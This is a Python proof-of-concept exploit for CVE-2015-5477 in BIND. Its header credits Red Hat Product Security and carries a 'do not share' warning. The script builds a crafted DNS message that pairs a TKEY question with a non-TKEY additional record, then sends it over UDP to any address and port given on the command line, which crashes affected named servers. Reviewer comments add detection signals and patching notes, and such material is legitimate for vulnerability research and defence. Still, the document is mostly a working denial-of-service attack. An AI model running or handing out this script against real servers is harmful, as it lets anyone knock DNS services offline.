#!/usr/bin/python

# usage: python CVE-2015-5477.py 127.0.0.1 53
#
# An affected BIND version will crash with a message like:
# Jul 27 22:17:28 localhost named[1746]: message.c:2311: REQUIRE(*name == ((void *)0)) failed, back trace
#
# Florian Weimer / Red Hat Product Security
#  
# PRIVATE EXPLOIT -- DO NOT SHARE

import dns.message
import dns.name
import dns.rdtypes.IN.A
import dns.rrset
import sys
import socket
from dns.rdataclass import IN

# Reproducer for CVE-2015-5477: builds one DNS message and sends it, once, to
# the server given on the command line. It does not wait for or read a reply.
#
# Exactly two arguments are expected (address, port); any other count makes the
# tuple unpacking below raise ValueError before anything is sent.
target, port = sys.argv[1:]
port = int(port)

# Owner name shared by the question and the additional record.
invalid = dns.name.from_text("invalid.")

# Additional-section RRset: an ordinary A record for the same owner name.
# 192.0.2.1 is in the TEST-NET-1 documentation range (RFC 5737).
# NOTE(review): dns.rdatatype is used here and below but never imported
# explicitly; it presumably resolves because another dns submodule imports
# it as a side effect -- confirm, or add `import dns.rdatatype` to the imports.
additional = dns.rrset.RRset(invalid, IN, dns.rdatatype.A)
additional.add(dns.rdtypes.IN.A.A(IN, dns.rdatatype.A, "192.0.2.1"))

# The message pairs a TKEY-type question with a non-TKEY record of the same
# name in the additional section. No answer or authority records are added.
# Per the header comment, an affected named aborts on a REQUIRE assertion in
# message.c when handling it, so that syslog line is the host-side indicator to
# alert on. TKEY-type queries arriving from unexpected sources are a candidate
# network-side signal -- an inference from the message shape, to be validated
# against local traffic.
# NOTE(review): remediation is a vendor-patched BIND build; the upstream
# advisory for this CVE reportedly lists no configuration workaround -- confirm
# against the advisory before relying on ACLs or similar controls.
msg = dns.message.Message()
msg.question.append(dns.rrset.RRset(invalid, IN, dns.rdatatype.TKEY))
msg.additional.append(additional)
# Print the message in text form, then the exact wire bytes, for the record.
print(msg.to_text())
blob = msg.to_wire()
print(repr(blob))

# One UDP datagram over IPv4 only (AF_INET). The socket is never closed
# explicitly; it is released when the script exits.
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
sock.sendto(blob, (target, port))